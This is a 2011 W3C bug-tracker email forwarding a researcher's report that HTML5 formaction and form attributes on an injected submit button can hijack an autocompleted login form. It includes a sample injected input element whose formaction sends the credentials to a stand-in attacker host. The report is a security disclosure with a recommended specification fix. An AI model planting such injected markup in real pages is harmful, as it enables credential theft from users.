- From: <bugzilla@jessica.w3.org>
- Date: Wed, 03 Aug 2011 05:53:23 +0000
- To: public-html-bugzilla@w3.org
http://www.w3.org/Bugs/Public/show_bug.cgi?id=13586
Summary: [html5] Input attributes allow form tampering
Product: HTML WG
Version: unspecified
Platform: Other
URL: http://www.w3.org/mid/1312266540.13091.2.camel@papyrus
OS/Version: All
Status: NEW
Severity: normal
Priority: P3
Component: HTML5 spec (editor: Ian Hickson)
AssignedTo: ian@hixie.ch
ReportedBy: mike+html-wg-mailbot@w3.org
QAContact: public-html-bugzilla@w3.org
CC: mike@w3.org, public-html-wg-issue-tracking@w3.org,
public-html@w3.org
public-html-comments posting from: Philippe De Ryck
<philippe.deryck@cs.kuleuven.be>
http://www.w3.org/mid/1312266540.13091.2.camel@papyrus
The following comment contains detailed information about an issue that
was discovered during a recent security analysis of 13 next generation
web standards, organized by ENISA (European Network and Information
Security Agency), and performed by the DistriNet Research Group (K.U.
Leuven, Belgium).
The complete report is available at http://www.enisa.europa.eu/html5
(*), and contains information about the process, the discovered
vulnerabilities and recommendations towards improving overall security
in the studied specifications.
Summary
---------
The insertion of a button that overwrites certain form attributes
increases the potential impact of HTML injection.
Based on: HTML5, 11 July 2011
Relevant Sections: 10.7. The input element
Issue
-------
The new form attributes, which can be used with submit buttons, can make
it difficult for a user to distinguish the form that is being submitted.
This can be used by an adversary to trick the user into submitting a
form, such as an autocompleted login form. Even though this attack was
already possible with JavaScript enabled, this new vector does not
depend on scripts. Additionally, it is possible that current content
validation filters do not yet prevent against button injection.
Code example
--------------
The actual form, which is probably auto-completed by the browser:
<form id="login"
action="http://testsrv1.example.com/enisa_ha/login.php" method="POST">
<input type="text" name="username" />
<input type="password" name="password" />
<input type="submit" value="Login" />
</form>
The injected code:
<input type="submit" value="Launch the game" form="login"
formaction="http://testsrv1.csrf.com/enisa_ha/login.php" />
Current state of implementation
---------------------------------
The current browser implementations show the following behavior:
* Firefox 5: Scenario is supported
* Chrome 12: Scenario is supported
* IE 8: No support for modifying form attributes
* Safari 5 (windows): No support for modifying form attributes
* Opera 11.50: No automatic autocomplete support, form attributes are
modifiable though
Recommended Solution
----------------------
Extend the form element with an additional attribute, which explicitly
enables non-hierarchical input elements to change form attributes.
Without this attribute, input elements cannot change form attributes,
which offers backwards security for current sites.
Alternatively, if changing the specification is not possible, developers
should be warned about this attack vector, so they can update their
content filters.
(*) HTML version of the report is available as well:
https://distrinet.cs.kuleuven.be/projects/HTML5-security/
--
Philippe De Ryck
K.U.Leuven, Dept. of Computer Science
Disclaimer: http://www.kuleuven.be/cwis/email_disclaimer.htm
--
Configure bugmail: http://www.w3.org/Bugs/Public/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the QA contact for the bug.
Received on Wednesday, 3 August 2011 05:53:24 UTC